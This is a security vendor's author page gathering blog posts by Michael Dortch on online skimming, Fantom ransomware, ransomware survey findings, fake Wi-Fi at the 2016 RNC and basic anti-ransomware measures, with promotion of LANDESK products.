About the Author

Michael Dortch

Malware in the News – and How to Beat It

GettyImages-459067087If there is a news topic generating more “F.U.D.”—fear, uncertainty, and doubt—than politics in the United States, it just may be cybersecurity.

According to an October 14 report on SC Magazine UK, a Dutch security analyst has discovered that more than 5,900 e-commerce sites contain malware that steals victims’ credit card details.

How did hackers gain access to and infect so many sites with malware? Through various unpatched software flaws.

In a blog post outlining his research, Willem De Groot provides some chilling and disheartening details.

Here are some highlights:

  • Online skimming is just like physical skimming. This involves replacing legitimate point-of-sale card-reading hardware with look-alike hardware that captures and diverts payment information to malefactors.
  • Online skimming is more effective because a) it is harder to detect and b) it is near impossible to trace the thieves.
  • [H]ackers gain access to a store’s source code using unpatched software flaws in various popular e-commerce software.
  • Victims vary from car makers (Audi ZA) to government (NRSC, Malaysia) to fashion (Converse, Heels.com), to pop stars (Bjork) to NGOs [non-governmental organizations] (Science Museum, Washington Cathedral).

De Groot also contacted several merchants directly to inform them of the results of his research. Here are three of the responses he got:

  • “We don’t care, our payments are handled by a 3rd party payment provider.” Remember that many high-profile, high-value security breaches of retailer environments gained access through third parties.
  • “Thanks for your suggestion, but our shop is totally safe. There is just an annoying JavaScript error.” De Groot responds, “If someone can inject JavaScript into your site, your database is most likely also hacked.”
  • “Our shop is safe because we use https” (HyperText Transfer Protocol Secure, a minimally secure Web communications protocol).

For those of us who are planning to do any online shopping this holiday season, news like this gives new urgency to the phrase caveat emptor (“let the buyer beware”). Meanwhile, those who are operators of online commerce facilities should adopt a complementary phrase—caveat venditor, or “let the seller beware.” They should also patch the operating systems and applications upon which their operations rely more consistently.

As important as they are, though, timely software patches and upgrades are only elements of a truly effective strategy for combating cyber threats such as online skimming. Such threats depend largely on being able to infiltrate and populate a network with rogue software.

An effective protection strategy must therefore accomplish three things:

  • Detection—Know as quickly as possible when malware attempts to infiltrate or infiltrates a network, wherever that attempt or infiltration takes place.
  • Prevention—Prevent as many attempted malware infiltrations as possible. (This is a primary role of effective, comprehensive patch and update management.)
  • Remediation—Stop malware that successfully infiltrates a system from running and spreading to other systems or networks, and protect resources from the effects of successful infiltrations wherever they take place across a network.

The need for a multi-layered approach to cybersecurity is exactly  why we created Endpoint Security Suite 2.0. This offering combines Shavlik Protect with AppSense Application Manager and AppSense Insight to deliver a solution that addresses all of the —software whitelisting, secure standard configurations, timely patching of applications and operating systems, and administrative privilege restrictions.

That same need is also why we’ve enhanced LANDESK Security Suite with multiple features that enable more and better detection, prevention, and remediation. It’s also why we created LANDESK Workspaces for the Security Admin. It provides consolidated, comprehensive information about vulnerabilities, threats, and available patches, via a flexible, visual interface.

Whether or not your company sells online, cyber threats are many, varied, and dangerous to your users, your critical information resources, and your organization as a whole. To begin improving your protections today, read my colleague Brent Bluth’s blog post, I.T.’s a Real Ditch Sometimes: Time to Make a Switch, which discusses the importance of patching to your multi-layered cybersecurity efforts. Then, learn more about our solutions, online or from your LANDESK, Shavlik, or AppSense representative. Together, we can make your enterprise more secure and resistant to even the most modern, powerful cybersecurity threats.


Fantom Ransomware: Looks Like Windows. Disrupts Like Hell.

Digital Internet securityAs if ransomware and Windows updates weren’t already challenging enough, a new threat pretends to be the latter but delivers the former.

If your organization has been in the process of deploying (or considering to deploy) Windows 10, then you already know about the issues regarding Microsoft’s shift to cumulative updates and the problems with third-party applications they’ve already caused at some companies.

Microsoft updates

Even if you’re not moving to Windows 10, you may still be affected by changes Microsoft is making to how it delivers updates to Windows 7 and Windows 8.1. And if you haven’t already, you should read the sagacious guidance offered in blog posts on these and related subjects by LANDESK Director of Product Management Stephen Brown and Senior Product Manager Chris Goettl.

In addition, you’ve doubtless heard and read about—or maybe even been affected by—ransomware.

Most ransomware infiltrates computer systems, locates and encrypts critical files, then demands payment of a ransom for access to the keys needed to restore access to those files. A recent variant, known as “Hitler ransomware,” threatens to encrypt critical files, but in reality, deletes them. (Read more about this variant in blog posts by me and Stephen.)

Fantom ransomware

And now, there’s Fantom. Once it gets into a system, it looks and acts like a legitimate critical Windows update. As reported by Lawrence Abrams of BleepingComputer.com and others, it even displays a realistic-looking screen that says the updates are being configured.


What’s really going on, though, is that the software is busily encrypting all the files it can find. It then displays a poorly written ransom note.


Once that note appears, victimized users have no choice but to pay the ransom and hope that they receive the decryption keys promised by that ransom note. And that those keys actually restore access to all of their files, and that the malware infection doesn’t result in further mayhem.

This is only one recent variation on the ransomware theme. Others can be at least as disruptive to your users and your business, if not more so. A ransomware variant known as “Petya,” for example, ignores your files and goes directly after the master boot records and file tables that govern access to entire hard drives.

Ransomware webinar on September 14

All of this is why we’re having a ransomware update webinar on September 14, featuring Stephen Brown and Principal Product Manager Eran Livne. (Eran’s also written some sagacious and helpful guidance for combatting ransomware, as have other members of the LANDESK team. You can browse, read, and share these in our ransomware archive.)

It’s also why we continue to evolve our solutions for fighting ransomware. In the webinar, Stephen and Eran will describe some specific upcoming enhancements to LANDESK Security Suite that can help you to defeat even the newest ransomware variants, and keep your organization’s computers and users productive and operational.

Get and stay ahead of the bad guys developing and distributing ransomware. Protect your organization, its users, and its critical information. Start now by registering for the webinar today!

Also, be sure to get your free copy of our most popular white paper below.


The Latest Shocking Ransomware Statistics and What You Need to Do

This past Wednesday, LANDESK hosted a webinar entitled “Ransomware: The NSA’s Top 10 Mitigation Strategies (and More).”

On that same day, ZDNet published an article that includes some fascinating—and frightening—findings from a recent survey of 540 CIOs, CISOs, and IT directors conducted by anti-malware specialists Malwarebytes.

Recent ransomware findings:

  • 40 percent of the businesses surveyed have suffered at least one ransomware attack in the past year.
  • 20 percent of the businesses surveyed “have had to stop operations entirely in the aftermath of a successful data breach.”
  • 34 percent of those businesses lost revenue as a result of ransomware attacks.
  • 60 percent of enterprise ransomware attacks each demanded a ransom of more than $1,000, and 20 percent demanded more than $10,000 each. Some ransom demands reported by survey respondents exceeded $150,000.
  • 63 percent of respondents said it took more than a full business day to install patches and “fix vulnerable endpoints” after a successful attack.

Perhaps most disturbingly, according to Malwarebytes, is that the number of exploit kits including instances of ransomware has increased by 259 percent in the past five months alone. And since exploit kits are designed to make hacking and malware delivery faster and easier, the number and severity of ransomware attacks are both likely headed in the same direction: up.

Given all of the above, it might be timely to assess your own enterprise’s preparedness to deal with ransomware. Fortunately for you, we’re here to help.

In our August 3 webinar, our Chief Security Officer Phil Richards summarized the findings and recommendations included in documents recently released by the U.S. National Security Agency (NSA), independently and in concert with more than a dozen other agencies.

He broke those findings and recommendations into six key areas. Here they are, ranked in order of importance based on poll question responses from webinar attendees.

Key recommendations:

  1. User education
  2. Data backup
  3. Network hardening
  4. Email hygiene
  5. System hardening
  6. Incident response

As Phil provided details about why each area is important and how best to implement it, I asked webinar attendees to indicate the implementation status of each at their own organizations. For each area, respondents were given four choices: comprehensive, extensive, limited, or none.

Here’s how the responses played out:

Category Comprehensive Extensive Limited None
User education 23% 18% 32% 27%
Data backup 45% 45% 9% 0%
Network hardening 32% 26% 37% 5%
Email hygiene 17% 56% 22% 6%
System hardening 26% 58% 11% 5%
Incident response 16% 32% 42% 11%

Respondents ranked user education as the most important of the six areas. However, more than a quarter of them said that their organizations have no formal user education processes or requirements in place.

This may explain why 52 percent of them said that user education is the anti-ransomware effort they expect to pursue most aggressively in the next six to 12 months.

In contrast, only four percent of respondents plan to pursue incident response most aggressively during the same period.

Given that 53 percent have only limited or no formal incident response processes in place across their enterprises, this could come back to haunt some of them should they experience a ransomware- or malware-driven incident.

If poll respondents from our webinar are indicative, ransomware priorities and preparations are all over the map for many enterprises. Possibly including your own, unless you already have or are moving toward comprehensive implementations across all six areas discussed above and in our webinar.

Otherwise, you should grab the on-demand version of our webinar to get Phil’s detailed and cogent implementation recommendations.

More ransomware resources

You should also definitely check out my colleague Eran Livne’s magnum opus, Everything You Need to Know to Prevent Ransomware, and some of the other blog posts we’ve produced on the subject.

And if you aren’t already using LANDESK Security Suite, AppSense Application Manager, or any of our other solutions for stopping ransomware and other threats in their tracks, you should at least be considering them. Contact your LANDESK or AppSense representative, or visit the product pages online to learn more or to request trials or demos. And come back here often to see our latest thinking and recommendations.

Ransomware is a real and growing threat, and we’re here to help you to avoid becoming its next victim.


Wi-Fi Security at the Republican National Convention? Not So Much

Now that the Republican National Convention (RNC) is over, it’s time to review what may be the biggest story to come out of that event. It’s a story of widespread deception that fooled many, and the possible consequences of the success of that deception.

I’m talking, of course, about the duping of some 1,200 convention delegates, who were fooled into logging onto fake, “free,” public Wi-Fi networks.

Fake Wi-Fi Networks

Avast, an antivirus software purveyor, set up fake Wi-Fi networks with real-sounding network names (SSIDs) for a single day. And ignoring much of the non-political news of the day and any education they may have received at work, delegates connected.

“Some 68.3 percent of users’ identities were exposed when they connected, and 44.5 percent of Wi-Fi users checked their emails or chatted via messenger apps,” The Register reported on July 21.

In many cases, delegates were completely clueless about the risks they were taking. “With mobile devices often set to connect to known SSIDs automatically, users can overlook the networks to which they are connecting. Although convenient, this feature is eminently easy to exploit by cybercriminals who set up a false Wi-Fi network with a common SSID. Moreover, web traffic can be visible to anyone on any Wi-Fi network that is unencrypted. Any Wi-Fi that does not require a password is a risk,” the article added.

Now, none of the preceding paragraphs should be news to anyone carrying a smartphone, whatever the delegate selection criteria were for this event. But sadly, the RNC Wi-Fi debacle is more typical than exceptional.

People Open Phishing Attachments

In his recent blog post, Ransomware: The Threat and How to Protect Your Enterprise Part 1, my learned colleague Eran Livne noted that “23 percent of those who receive phishing emails open them, and 11 percent of those recipients click on attachments to those emails,” from the Verizon 2015 Data Breach Investigations Report.

Verizon also found that a phishing campaign of as few as ten emails was more than 90 percent likely to fool at least one recipient. This despite earnest user education efforts about ransomware, not to mention highly visible media coverage.

Which brings us to the crux of the issue: the all-too-human tendency to know, but not to do.

To Know, But Not to Do

“Currently, more than one in three American adults over 20 is obese—up from roughly one in four 20 years ago—and nearly 70 percent are overweight,” reported Catey Hill in the December 2015 MarketWatch.com article.

And those figures make weight loss big business.

“Companies that focus on weight-loss services (think Nutrisystem and Weight Watchers) raked in $6.3 billion in revenue in 2015, according to an IBISWorld report; sales of supplements—many of which promise weight loss—add billions more,” the article added.

By the way, that IBISWorld report estimated 2015 profits for weight-loss companies at $934.5 million.

The amazing thing about this market? Most weight-loss advice boils down to the same guidance: eat more mindfully and move more often. Which implies that most of us who struggle to avoid the “obese” category know what we need to do, but just don’t do it.

Wi-Fi security is a lot like weight loss. Tons of money gets spent on Wi-Fi security, but someone puts themselves, their personal information, and their company’s networks at risk every day by connecting to networks with no or inadequate security.

You Know What to Do, So Do It!

So, as Eran also said in his blog post, “…by all means, implement a user-education program—but also take at least some basic measures to protects the data on all endpoint devices.”

LANDESK can help, and you don’t even have to buy anything. Start by reading Part 1 and Part 2 of Eran Livne’s ransomware blog post.

Then, head for the LANDESK webinars page, and register for our August 3 webinar on: “Ransomware: The NSA’s Top 10 Mitigation Strategies (and More),” which will feature LANDESK CSO Phil Richards.

Don’t forget to check out some of our solutions for fighting ransomware and other IT threats, including our free white paper below. That way you can minimize the negative effects of that all-too-human tendency mentioned earlier, “to know, but not to do,” the next time it hits one of your colleagues. Or you. (Just sayin’.)


10 Effective Ways You Can Combat Ransomware Right Now

Lock like digital protectionRansomware is malware that infects computer networks, encrypts data across those networks, and then demands payment of a ransom to restore access to the hijacked data. The threat has already cost companies of all sizes and types millions of dollars in fines and lost productivity.

Ransomware attacks are growing in number and sophistication. Fortunately, there are simple and affordable measures you and your colleagues can take, beginning today, to lessen ransomware’s threat to your networks, your users, their productivity, and your organization’s critical data.

Here are ten ways your company can protect itself against ransomware:

1. Educate users about phishing emails and email attachments.

More than 20 percent of people who receive phishing emails open them. What’s worse, more than ten percent of people who open phishing emails also click on the accompanying attachments.

2. Patch critical operating systems and applications.

Doing this will greatly increase resistance to all types of threats and attacks, including ransomware. LANDESK’s Patch Manager applies patches across an enterprise automatically and easily.

3. Keep incumbent AV tools and other protections updated regularly.

In the face of ever-evolving threats, out-of-date protections offer no real protection at all.

4. Manage and limit the use of privileged accounts.

Ransomware and other attacks often use privileged accounts to spread themselves to other computers and networks.

5. Keep your backups complete and current.

Users can then get back to work more quickly and effectively, even if paying the ransom doesn’t restore access to data quickly, completely, or at all.

6. Implement and enforce access control, preferably focusing on data criticality and not just user rights.

This can limit the effects of attacks that get through your environment’s protective measures.

7. Impose restrictions on the types of files and folders your applications are allowed to access and manipulate.

Ransomware can’t use applications to encrypt data that those applications can’t access.

8. Disable macros in Microsoft Office files and elsewhere wherever possible.

Strike the best possible balance between protecting your environment and disrupting user productivity.

9. Implement trusted ownership of and access to applications and critical data.

Restrict or ban entirely applications, folders, and files that aren’t known to be from trusted sources.

10. Use virtualization and other technologies to isolate applications and files.

This will prevent them from spreading ransomware more broadly should they become infected.

Any combination of the above steps, including LANDESK Security Suite (LDSS), will make your computing environment much more secure and resistant to ransomware and other threats.

Don’t risk becoming ransomware’s next victim on its growing roster of targeted businesses. Get started today! Download our FREE whitepaper as a handy reminder of all the ways in which you can protect against ransomware now:


Security Salaries Are Soaring—What Should You Do?

AreYouReady(own)“[V]acancies in cyber-security positions have skyrocketed as have CISOs salaries.…CISO salaries have gone up considerably in the last two years, with very few dropping below £100,000 (approximately US$146,000) a year.”

—“CISO salaries and demand for cyber-skills skyrockets, surprising no-one,” SC Magazine, Jan. 29, 2016

“Leading roles in cyber security, such as cyber security head, will see an increase of 18% in salary, while roles in cyber security analysis will see a pay rise of 7%.”

—“IT security salaries on the rise as cyber crime increases,” ComputerWeekly.com, Jan. 29, 2016

It is not news to most who follow the IT industry that there is a “skills gap” in the security arena, a gap that has in fact existed for some time. However, with the number, severity and costs associated with security breaches increasing dramatically since 2014, that gap and what to do about it is now top of mind for many IT and security decision makers.

Reputation: Why Your Business is Only as Good as its Least Reputable Application

The weakest linkYour company’s reputation is a cornerstone of its trustworthiness, which in turn directly affects its ability to thrive competitively. Or as world-famous investor Warren Buffet has said, “It takes 20 years to build a reputation and five minutes to ruin it. If you think about that, you’ll do things differently.”

The pervasive growth of IT in business has reduced the amount of time it takes to ruin a corporate reputation from five minutes to milliseconds. This is true because it only takes milliseconds for a security breach to access your network via an application vulnerability, then to begin disrupting your company’s ability to do business.

Your “ART-ful” Enterprise: Security and Trustworthiness

TechArt(own)resizesAs discussed here previously, to become more “ART-ful,” your enterprise must become more agile, resilient, and trustworthy. This post digs a bit more deeply into trustworthiness, why it matters, how to achieve and sustain it and the critical role of security in those efforts.

Let’s cut to the chase. There are likely no circumstances under which you would choose to do business with any person or business you could not trust.

Your “ART-ful” Enterprise: Security and Resilience

Cybersecurity(Own)As discussed previously (in “Security and the ‘ART-ful’ Enterprise” and “Your ‘ART-ful’ Enterprise: Security and Agility“), to become more “ART-ful,” your enterprise must become more agile, resilient, and trustworthy. This post digs a bit more deeply into what business resilience (or its less common synonym, “resiliency”) is, why it matters, and how to achieve and sustain it.

As is true with business agility, business resilience is a much broader and deeper consideration than many typical discussions of the subject seem to indicate.